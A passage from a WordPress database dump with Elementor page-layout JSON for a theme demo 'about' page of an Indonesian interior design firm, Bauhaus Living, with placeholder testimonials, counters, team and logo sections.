right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"REDESIGN LIFE\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.<\\/p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.<\\/p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi perencanaan & interior design\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"ced22e0\"},{\"text\":\"Penyusunan Rencana Anggaran Belanja\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Produksi furniture dan pekerjaan sipil\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"John Alan\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about BauHaus\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges in deploying\\ninterior design applications\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or call: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"+ 1800-111-543 \",\"phone_address\":\"1800111543\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\",\"total_count\":6,\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3643,4841,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3644,4841,'_elementor_pro_version','3.8.1'),(3645,4842,'_wp_page_template','elementor_header_footer'),(3646,4842,'_elementor_edit_mode','builder'),(3647,4842,'_elementor_template_type','wp-page'),(3648,4842,'_elementor_version','3.8.1'),(3649,4842,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\